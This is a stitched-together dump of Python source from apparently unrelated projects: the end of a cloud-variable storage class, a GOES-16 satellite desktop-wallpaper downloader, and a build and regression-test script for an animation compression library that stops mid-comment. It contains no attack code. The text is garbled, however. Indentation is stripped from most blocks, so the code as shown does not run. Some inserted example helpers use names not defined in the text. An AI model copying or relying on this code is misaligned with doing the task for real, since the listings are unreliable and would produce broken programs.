n = f"☁ {variable_name.strip()}"
else:
n = f"{variable_name.strip()}"
data = []
d = self.cloud.get_variable_data(limit=limit)
i = 0
while i < len(d):
if d[i]['Name'] == n:
data.append([d[i]['Value'], d[i]['User']])
i = i + 1
return data
def _divide_code(self, data, letters_length, list_length=8):
i = 0
divide = []
text = ""
while i < len(data):
text += data[i]
if len(text) >= letters_length:
divide.append(text)
text = ""
i += 1
if len(text) > 0:
divide.append(text)
while len(divide) < list_length:
divide.append('')
return divide
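# Worked example (not part of the original module): _divide_code splits an encoded string
# into chunks of at most `letters_length` characters and pads the result with empty
# strings until it holds `list_length` entries, matching the eight response cloud
# variables. A 600-character payload with the default 256-character limit therefore
# comes back as three chunks of 256, 256 and 88 characters plus five empty slots.
def _divide_code_example():
    storage = CloudStorage.__new__(CloudStorage)  # bypass __init__ for this sketch only
    chunks = storage._divide_code('a' * 600, _VARIABLE_LENGTH)
    assert [len(c) for c in chunks] == [256, 256, 88, 0, 0, 0, 0, 0]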
|
__main__.py
|
#!/usr/bin/env python3
import argparse
from datetime import timedelta, datetime
import io
import itertools as it
import json
from lxml import html
import math
import multiprocessing as mp
import multiprocessing.dummy as mp_dummy
import os
import os.path as path
import sys
from time import strptime, strftime, mktime
import urllib.request
from glob import iglob, glob
import threading
import time
import warnings
import appdirs
from PIL import Image, ImageDraw, ImageFilter
from dateutil.tz import tzlocal
from .utils import set_background, get_desktop_environment, is_discharging, download
# Semantic Versioning: Major, Minor, Patch
GOES16_BG_VERSION = (1, 2, 0)
counter = None
TILE_SIZE = 678
BASE_URL = "http://rammb-slider.cira.colostate.edu/data"
# The image is yuuge
warnings.simplefilter('ignore', Image.DecompressionBombWarning)
def parse_args():
parser = argparse.ArgumentParser(description="set (near-realtime) picture of Earth as your desktop background",
epilog="http://github.com/cameronleger/goes16-background")
parser.add_argument("--version", action="version", version="%(prog)s {}.{}.{}".format(*GOES16_BG_VERSION))
parser.add_argument("-s", "--size", type=int, choices=[678, 1356, 2712, 5424, 10848], dest="size", default=1356,
help="increases the quality (and the size) the image. possible values are 678, 1356, 2712, 5424, 10848")
parser.add_argument("-d", "--deadline", type=int, dest="deadline", default=6,
help="deadline in minutes to download the image, set 0 to cancel")
parser.add_argument("--save-battery", action="store_true", dest="save_battery", default=False,
help="stop refreshing on battery")
parser.add_argument("--output-dir", type=str, dest="output_dir",
help="directory to save the temporary background image",
default=appdirs.user_cache_dir(appname="goes16background", appauthor=False))
parser.add_argument("--composite-over", type=str, dest="composite_over",
help="image to composite the background image over",
default=None)
parser.add_argument("--no_set_bg", dest="no_set_bg", action='store_true',
help="do not try to set background, just download file", default=False)
try:
args = parser.parse_args()
except:
parser.print_help()
sys.exit(0)
    if args.deadline < 0:
        sys.exit("DEADLINE has to be zero (to disable it) or a positive number of minutes!\n")
return args
def download_chunk(args):
global counter
base_url, latest, x, y, level, tile_count = args
url_format = base_url + "/imagery/{}/goes-16---full_disk/natural_color/{}/0{}/00{}_00{}.png"
url = url_format.format(strftime("%Y%m%d", latest), strftime("%Y%m%d%H%M%S", latest), level, y, x)
tiledata = download(url)
with counter.get_lock():
counter.value += 1
if counter.value == tile_count * tile_count:
print("Downloading tiles: completed.")
else:
print("Downloading tiles: {}/{} completed...".format(counter.value, tile_count * tile_count))
return x, y, tiledata
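# Illustrative sketch (not part of the original script): for the default 1356px image,
# tile_count is 1356 // 678 = 2 and level is log2(2) = 1, so download_chunk fetches the
# four tiles 000_000 .. 001_001 at that zoom level. The helper below only reproduces the
# URL formatting, using a hypothetical timestamp rather than the live latest_times.json.
def example_tile_url(x=0, y=0, level=1):
    latest = strptime("20210101120000", "%Y%m%d%H%M%S")
    url_format = BASE_URL + "/imagery/{}/goes-16---full_disk/natural_color/{}/0{}/00{}_00{}.png"
    return url_format.format(strftime("%Y%m%d", latest), strftime("%Y%m%d%H%M%S", latest), level, y, x)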
def exit_thread(message):
print(message)
sys.exit(message)
def thread_main(args):
global counter
counter = mp.Value("i", 0)
tile_count = int(args.size / TILE_SIZE)
level = int(math.log(tile_count, 2))
print("Updating...")
latest_json = download("{}/json/goes-16/full_disk/natural_color/latest_times.json".format(BASE_URL))
latest = strptime(str(json.loads(latest_json.decode("utf-8"))["timestamps_int"][0]), "%Y%m%d%H%M%S")
print("Latest version: {} UTC.".format(strftime("%Y/%m/%d %H:%M:%S", latest)))
if args.composite_over is not None:
print("Opening image to composite over...")
try:
composite_img = Image.open(args.composite_over)
except Exception as e:
exit_thread("Unable to open --composite-over image!\n")
goes16_width = TILE_SIZE * tile_count
goes16_height = TILE_SIZE * tile_count
goes16_img = Image.new("RGB", (goes16_width, goes16_height))
p = mp_dummy.Pool(tile_count * tile_count)
print("Downloading tiles...")
res = p.map(download_chunk, it.product((BASE_URL,), (latest,), range(tile_count), range(tile_count), (level,), (tile_count,)))
for (x, y, tiledata) in res:
tile = Image.open(io.BytesIO(tiledata))
goes16_img.paste(tile, (TILE_SIZE * x, TILE_SIZE * y, TILE_SIZE * (x + 1), TILE_SIZE * (y + 1)))
output_img = goes16_img
if args.composite_over is not None:
print("Compositing over input image")
composite_width, composite_height = composite_img.size
resize_ratio = min(composite_width / goes16_width, composite_height / goes16_height)
goes16_img = goes16_img.resize((round(goes16_width * resize_ratio), round(goes16_height * resize_ratio)),
Image.ANTIALIAS)
radius_img = min(goes16_width, goes16_height) * resize_ratio / 2
goes16_center_img = Image.new("RGB", (composite_width, composite_height), "black")
goes16_center_img.paste(goes16_img, (round(composite_width / 2 - radius_img), round(composite_height / 2 - radius_img)))
radius = min(goes16_width, goes16_height) * resize_ratio * 0.995 / 2
left = round(composite_width / 2 - radius)
right = round(composite_width / 2 + radius)
top = round(composite_height / 2 - radius)
bottom = round(composite_height / 2 + radius)
mask_img = Image.new("L", (composite_width, composite_height), "black")
draw = ImageDraw.Draw(mask_img)
draw.ellipse((left, top, right, bottom), fill='white')
mask_img = mask_img.filter(ImageFilter.GaussianBlur(radius=2))
composite_img.paste(goes16_center_img, (0, 0), mask_img)
output_img = composite_img
for file in iglob(path.join(args.output_dir, "goes16-*.png")):
os.remove(file)
output_file = path.join(args.output_dir, strftime("goes16-%Y%m%dT%H%M%S.png", latest))
print("Saving to '%s'..." % (output_file,))
os.makedirs(path.dirname(output_file), exist_ok=True)
output_img.save(output_file, "PNG")
if not args.no_set_bg:
if not set_background(output_file):
exit_thread("Your desktop environment '{}' is not supported!\n".format(get_desktop_environment()))
def main():
args = parse_args()
print("goes16-background {}.{}.{}".format(*GOES16_BG_VERSION))
if args.save_battery and is_discharging():
sys.exit("Discharging!\n")
main_thread = threading.Thread(target=thread_main, args=(args,), name="goes16-background-main-thread", daemon=True)
main_thread.start()
main_thread.join(args.deadline * 60 if args.deadline else None)
if args.deadline and main_thread.is_alive():
sys.exit("Timeout!\n")
print()
sys.exit(0)
if __name__ == "__main__":
main()
|
make.py
|
# coding: utf-8
from __future__ import print_function
import argparse
import multiprocessing
import os
import platform
import re
import shutil
import subprocess
import sys
import threading
import time
import zipfile
# The current test/decompression data version in use
current_test_data = 'test_data_v5'
current_decomp_data = 'decomp_data_v7'
def parse_argv():
parser = argparse.ArgumentParser(add_help=False)
actions = parser.add_argument_group(title='Actions', description='If no action is specified, on Windows, OS X, and Linux the solution/make files are generated. Multiple actions can be used simultaneously.')
actions.add_argument('-build', action='store_true')
actions.add_argument('-clean', action='store_true')
actions.add_argument('-clean_only', action='store_true')
actions.add_argument('-unit_test', action='store_true')
actions.add_argument('-regression_test', action='store_true')
actions.add_argument('-bench', action='store_true')
actions.add_argument('-run_bench', action='store_true')
actions.add_argument('-pull_bench', action='store_true') # Android only
actions.add_argument('-convert', help='Input/Output directory to convert')
target = parser.add_argument_group(title='Target')
target.add_argument('-compiler', choices=['vs2015', 'vs2017', 'vs2019', 'vs2019-clang', 'android', 'clang4', 'clang5', 'clang6', 'clang7', 'clang8', 'clang9', 'clang10', 'clang11', 'gcc5', 'gcc6', 'gcc7', 'gcc8', 'gcc9', 'gcc10', 'osx', 'ios', 'emscripten'], help='Defaults to the host system\'s default compiler')
target.add_argument('-config', choices=['Debug', 'Release'], type=str.capitalize)
target.add_argument('-cpu', choices=['x86', 'x64', 'armv7', 'arm64', 'wasm'], help='Defaults to the host system\'s architecture')
misc = parser.add_argument_group(title='Miscellaneous')
misc.add_argument('-avx', dest='use_avx', action='store_true', help='Compile using AVX instructions on Windows, OS X, and Linux')
misc.add_argument('-pop', dest='use_popcnt', action='store_true', help='Compile using the POPCNT instruction')
misc.add_argument('-nosimd', dest='use_simd', action='store_false', help='Compile without SIMD instructions')
misc.add_argument('-nosjson', dest='use_sjson', action='store_false', help='Compile without SJSON support')
    misc.add_argument('-num_threads', help='Number of threads to use while compiling and running regression tests')
misc.add_argument('-tests_matching', help='Only run tests whose names match this regex')
misc.add_argument('-help', action='help', help='Display this usage information')
num_threads = multiprocessing.cpu_count()
if platform.system() == 'Linux' and sys.version_info >= (3, 4):
num_threads = len(os.sched_getaffinity(0))
if not num_threads or num_threads == 0:
num_threads = 4
parser.set_defaults(build=False, clean=False, clean_only=False, unit_test=False, regression_test=False, bench=False, run_bench=False, pull_bench=False,
compiler=None, config='Release', cpu=None, use_avx=False, use_popcnt=False, use_simd=True, use_sjson=True,
num_threads=num_threads, tests_matching='')
args = parser.parse_args()
# Sanitize and validate our options
if args.use_avx and not args.use_simd:
print('SIMD is disabled; AVX cannot be used')
args.use_avx = False
if args.compiler == 'android':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Windows':
print('Android is only supported on Windows')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on Android')
sys.exit(1)
if not args.cpu in ['armv7', 'arm64']:
print('{} cpu architecture not in supported list [armv7, arm64] for Android'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'ios':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Darwin':
print('iOS is only supported on OS X')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on iOS')
sys.exit(1)
if args.unit_test:
print('Unit tests cannot run from the command line on iOS')
sys.exit(1)
if not args.cpu in ['arm64']:
print('{} cpu architecture not in supported list [arm64] for iOS'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'emscripten':
if not args.cpu:
args.cpu = 'wasm'
if not platform.system() == 'Darwin' and not platform.system() == 'Linux':
print('Emscripten is only supported on OS X and Linux')
sys.exit(1)
if args.use_avx:
print('AVX is not supported with Emscripten')
sys.exit(1)
if not args.cpu in ['wasm']:
print('{} cpu architecture not in supported list [wasm] for Emscripten'.format(args.cpu))
sys.exit(1)
else:
if not args.cpu:
args.cpu = 'x64'
if args.cpu == 'arm64':
if not args.compiler in ['vs2017', 'vs2019', 'ios', 'android']:
print('arm64 is only supported with VS2017, VS2019, Android, and iOS')
sys.exit(1)
elif args.cpu == 'armv7':
if not args.compiler == 'android':
print('armv7 is only supported with Android')
sys.exit(1)
elif args.cpu == 'wasm':
if not args.compiler == 'emscripten':
print('wasm is only supported with Emscripten')
sys.exit(1)
if platform.system() == 'Darwin' and args.cpu == 'x86':
result = subprocess.check_output(['xcodebuild', '-version']).decode("utf-8")
if 'Xcode 11' in result:
print('Versions of Xcode 11 and up no longer support x86')
sys.exit(1)
return args
def get_generator(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2015':
if cpu == 'x86':
return 'Visual Studio 14'
elif cpu == 'x64':
return 'Visual Studio 14 Win64'
elif compiler == 'vs2017':
if cpu == 'x86':
return 'Visual Studio 15'
elif cpu == 'x64':
return 'Visual Studio 15 Win64'
elif cpu == 'arm64':
# VS2017 ARM/ARM64 support only works with cmake 3.13 and up and the architecture must be specified with
# the -A cmake switch
return 'Visual Studio 15 2017'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
return 'Visual Studio 16 2019'
elif compiler == 'android':
# For Android, we use the default generator since we don't build with CMake
return None
elif platform.system() == 'Darwin':
if compiler == 'osx' or compiler == 'ios':
return 'Xcode'
elif compiler == 'emscripten':
# Emscripten uses the default generator
return None
elif platform.system() == 'Linux':
if compiler == 'emscripten':
# Emscripten uses the default generator
return None
return 'Unix Makefiles'
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def get_architecture(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2017':
if cpu == 'arm64':
return 'ARM64'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
if cpu == 'x86':
return 'Win32'
else:
return cpu
# This compiler/cpu pair does not need the architecture switch
return None
def get_toolchain(compiler, cmake_script_dir):
if platform.system() == 'Windows' and compiler == 'android':
return os.path.join(cmake_script_dir, 'Toolchain-Android.cmake')
elif platform.system() == 'Darwin' and compiler == 'ios':
return os.path.join(cmake_script_dir, 'Toolchain-iOS.cmake')
# No toolchain
return None
def set_compiler_env(compiler, args):
if platform.system() == 'Linux':
os.environ['MAKEFLAGS'] = '-j{}'.format(args.num_threads)
if compiler == 'clang4':
os.environ['CC'] = 'clang-4.0'
os.environ['CXX'] = 'clang++-4.0'
elif compiler == 'clang5':
os.environ['CC'] = 'clang-5.0'
os.environ['CXX'] = 'clang++-5.0'
elif compiler == 'clang6':
os.environ['CC'] = 'clang-6.0'
os.environ['CXX'] = 'clang++-6.0'
elif compiler == 'clang7':
os.environ['CC'] = 'clang-7'
os.environ['CXX'] = 'clang++-7'
elif compiler == 'clang8':
os.environ['CC'] = 'clang-8'
os.environ['CXX'] = 'clang++-8'
elif compiler == 'clang9':
os.environ['CC'] = 'clang-9'
os.environ['CXX'] = 'clang++-9'
elif compiler == 'clang10':
os.environ['CC'] = 'clang-10'
os.environ['CXX'] = 'clang++-10'
elif compiler == 'clang11':
os.environ['CC'] = 'clang-11'
os.environ['CXX'] = 'clang++-11'
elif compiler == 'gcc5':
os.environ['CC'] = 'gcc-5'
os.environ['CXX'] = 'g++-5'
elif compiler == 'gcc6':
os.environ['CC'] = 'gcc-6'
os.environ['CXX'] = 'g++-6'
elif compiler == 'gcc7':
os.environ['CC'] = 'gcc-7'
os.environ['CXX'] = 'g++-7'
elif compiler == 'gcc8':
os.environ['CC'] = 'gcc-8'
os.environ['CXX'] = 'g++-8'
elif compiler == 'gcc9':
os.environ['CC'] = 'gcc-9'
os.environ['CXX'] = 'g++-9'
elif compiler == 'gcc10':
os.environ['CC'] = 'gcc-10'
os.environ['CXX'] = 'g++-10'
elif compiler == 'emscripten':
# Nothing to do for Emscripten
return
else:
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def do_generate_solution(build_dir, cmake_script_dir, test_data_dir, decomp_data_dir, args):
compiler = args.compiler
cpu = args.cpu
config = args.config
if compiler:
set_compiler_env(compiler, args)
extra_switches = ['--no-warn-unused-cli']
extra_switches.append('-DCPU_INSTRUCTION_SET:STRING={}'.format(cpu))
if args.use_avx:
print('Enabling AVX usage')
extra_switches.append('-DUSE_AVX_INSTRUCTIONS:BOOL=true')
if args.use_popcnt:
print('Enabling POPCOUNT usage')
extra_switches.append('-DUSE_POPCNT_INSTRUCTIONS:BOOL=true')
if not args.use_simd:
print('Disabling SIMD instruction usage')
extra_switches.append('-DUSE_SIMD_INSTRUCTIONS:BOOL=false')
if not args.use_sjson:
print('Disabling SJSON support')
extra_switches.append('-DUSE_SJSON:BOOL=false')
if args.bench:
extra_switches.append('-DBUILD_BENCHMARK_EXE:BOOL=true')
if not platform.system() == 'Windows':
extra_switches.append('-DCMAKE_BUILD_TYPE={}'.format(config.upper()))
toolchain = get_toolchain(compiler, cmake_script_dir)
if toolchain:
extra_switches.append('-DCMAKE_TOOLCHAIN_FILE={}'.format(toolchain))
if test_data_dir:
extra_switches.append('-DTEST_DATA_DIR:STRING="{}"'.format(test_data_dir))
if decomp_data_dir:
extra_switches.append('-DDECOMP_DATA_DIR:STRING="{}"'.format(decomp_data_dir))
# Generate IDE solution
print('Generating build files ...')
if compiler == 'emscripten':
cmake_cmd = 'emcmake cmake .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(build_dir, ' '.join(extra_switches))
else:
cmake_generator = get_generator(compiler, cpu)
if not cmake_generator:
print('Using default generator')
else:
generator_suffix = ''
if compiler == 'vs2019-clang':
extra_switches.append('-T ClangCL')
generator_suffix = 'Clang CL'
print('Using generator: {} {}'.format(cmake_generator, generator_suffix))
extra_switches.append('-G "{}"'.format(cmake_generator))
cmake_arch = get_architecture(compiler, cpu)
if cmake_arch:
print('Using architecture: {}'.format(cmake_arch))
extra_switches.append('-A {}'.format(cmake_arch))
cmake_cmd = 'cmake .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(build_dir, ' '.join(extra_switches))
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_build(args):
config = args.config
print('Building ...')
cmake_cmd = 'cmake --build .'
if platform.system() == 'Windows':
if args.compiler == 'android':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target INSTALL'.format(config)
elif platform.system() == 'Darwin':
if args.compiler == 'ios':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target install'.format(config)
else:
cmake_cmd += ' --target install'
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_convert(test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run conversion')
sys.exit(1)
if not os.path.exists(args.convert):
print('Input/Output conversion directory not found: {}'.format(args.convert))
sys.exit(1)
# Validate that our regression testing tool is present
if args.compiler == 'emscripten':
compressor_exe_path = './bin/acl_compressor.js'
elif platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
conversion_clips = []
for (dirpath, dirnames, filenames) in os.walk(args.convert):
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
clip_filename = os.path.join(dirpath, filename)
conversion_clips.append(clip_filename)
# Grab the raw config
config_dir = os.path.join(test_data_dir, 'configs')
config_filename = os.path.join(config_dir, 'uniformly_sampled_raw.config.sjson')
print('Converting SJSON clips in {} ...'.format(args.convert))
conversion_failed = False
for clip_filename in conversion_clips:
output_filename = clip_filename.replace('.acl.sjson', '.acl')
if args.compiler == 'emscripten':
cmd = 'node "{}" -acl="{}" -config="{}" -out="{}"'.format(compressor_exe_path, clip_filename, config_filename, output_filename)
else:
cmd = '"{}" -acl="{}" -config="{}" -out="{}"'.format(compressor_exe_path, clip_filename, config_filename, output_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
result = subprocess.call(cmd, shell=True)
if result != 0:
print('Failed to run conversion for clip: {}'.format(clip_filename))
print(cmd)
conversion_failed = True
print('Done!')
if conversion_failed:
sys.exit(1)
def do_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tests', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.unit_tests/com.acl.unit_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_tests_cmake(args):
ctest_cmd = 'ctest --output-on-failure --parallel {}'.format(args.num_threads)
if platform.system() == 'Windows' or platform.system() == 'Darwin':
ctest_cmd += ' -C {}'.format(args.config)
if args.tests_matching:
ctest_cmd += ' --tests-regex {}'.format(args.tests_matching)
result = subprocess.call(ctest_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_tests(build_dir, args):
print('Running unit tests ...')
if args.compiler == 'android':
do_tests_android(build_dir, args)
else:
do_tests_cmake(args)
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
# We need to clear any previous line we might have to ensure we have no visual artifacts
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
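# Illustrative usage sketch (not part of the original build script): print_progress is
# meant to be called once per completed item, as the regression-test loop below does
# while polling its worker queues. The totals here are arbitrary example values.
def _print_progress_example(total=25):
    for i in range(total + 1):
        print_progress(i, total, 'Example:', '{} / {}'.format(i, total))
        time.sleep(0.01)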
def do_prepare_regression_test_data(test_data_dir, args):
print('Preparing regression test data ...')
current_test_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_test_data))
# Validate that our regression test data is present
if not os.path.exists(current_test_data_zip):
print('Regression test data not found: {}'.format(current_test_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
needs_decompression = not os.path.exists(current_test_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_test_data_zip))
with zipfile.ZipFile(current_test_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
regression_clips = []
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
if len(regression_clips) == 0:
print('No regression clips found')
sys.exit(1)
print('Found {} regression clips'.format(len(regression_clips)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
if len(test_configs) == 0:
print('No regression configurations found')
sys.exit(1)
print('Found {} regression configurations'.format(len(test_configs)))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Write our metadata file
with open(os.path.join(current_test_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('configs = [', file = metadata_file)
for config_filename, _ in test_configs:
print('\t"{}"'.format(os.path.relpath(config_filename, test_config_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename, _ in regression_clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_test_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_test_data_dir
def do_prepare_decompression_test_data(test_data_dir, args):
print('Preparing decompression test data ...')
current_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_decomp_data))
    # Validate that our decompression test data is present
if not os.path.exists(current_data_zip):
print('Decompression test data not found: {}'.format(current_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
needs_decompression = not os.path.exists(current_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_data_zip))
with zipfile.ZipFile(current_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
clips = []
for (dirpath, dirnames, filenames) in os.walk(current_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
clips.append(clip_filename)
if len(clips) == 0:
print('No decompression clips found')
sys.exit(1)
print('Found {} decompression clips'.format(len(clips)))
# Write our metadata file
with open(os.path.join(current_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('clip_dir = "{}"'.format(current_data_dir), file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename in clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_data_dir
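# Illustrative sketch (not part of the original build script): the metadata.sjson written
# above ends up with roughly the following shape (paths here are hypothetical):
#
#   clip_dir = "/path/to/decomp_data_v7"
#
#   clips = [
#       "clip_a.acl"
#       "clip_b.acl"
#   ]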
def do_regression_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'regression_tester_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.regression_tests/com.acl.regression_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_regression_tests_cmake(test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run regression tests')
sys.exit(1)
import queue
# Validate that our regression testing tool is present
if args.compiler == 'emscripten':
compressor_exe_path = './bin/acl_compressor.js'
elif platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
regression_clips = []
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Iterate over every clip and configuration and perform the regression testing
for config_filename, _ in test_configs:
print('Performing regression tests for configuration: {}'.format(os.path.basename(config_filename)))
regression_start_time = time.perf_counter()
cmd_queue = queue.Queue()
completed_queue = queue.Queue()
failed_queue = queue.Queue()
failure_lock = threading.Lock()
for clip_filename, _ in regression_clips:
if args.compiler == 'emscripten':
cmd = 'node "{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
else:
cmd = '"{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((clip_filename, cmd))
		# Add one sentinel marker per worker thread so each worker knows when to stop (see the sketch after this function)
for i in range(args.num_threads):
cmd_queue.put(None)
def run_clip_regression_test(cmd_queue, completed_queue, failed_queue, failure_lock):
while True:
entry = cmd_queue.get()
if entry is None:
return
(clip_filename, cmd) = entry
result = subprocess.call(cmd, shell=True)
if result != 0:
failed_queue.put((clip_filename, cmd))
failure_lock.acquire()
print('Failed to run regression test for clip: {}'.format(clip_filename))
print(cmd)
failure_lock.release()
completed_queue.put(clip_filename)
threads = [ threading.Thread(target = run_clip_regression_test, args = (cmd_queue, completed_queue, failed_queue, failure_lock)) for _i in range(args.num_threads) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(regression_clips), 'Testing clips:', '{} / {}'.format(0, len(regression_clips)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = completed_queue.qsize()
print_progress(num_processed, len(regression_clips), 'Testing clips:', '{} / {}'.format(num_processed, len(regression_clips)))
all_threads_done = True
for thread in threads:
if thread.is_alive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
regression_testing_failed = not failed_queue.empty()
regression_end_time = time.perf_counter()
print('Done in {}'.format(format_elapsed_time(regression_end_time - regression_start_time)))
if regression_testing_failed:
sys.exit(1)
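# The shutdown scheme used above is the classic queue sentinel pattern: one None entry is
# queued per worker thread, and each worker returns as soon as it pops a None. A minimal
# standalone sketch of the same idea (the names below are illustrative, not part of this script):
#
#   import queue, threading
#
#   def worker(q):
#       while True:
#           item = q.get()
#           if item is None:
#               return  # sentinel received, stop this worker
#           handle(item)  # placeholder for the real per-item work
#
#   q = queue.Queue()
#   for item in work_items:  # work_items stands in for the real inputs
#       q.put(item)
#   num_workers = 4
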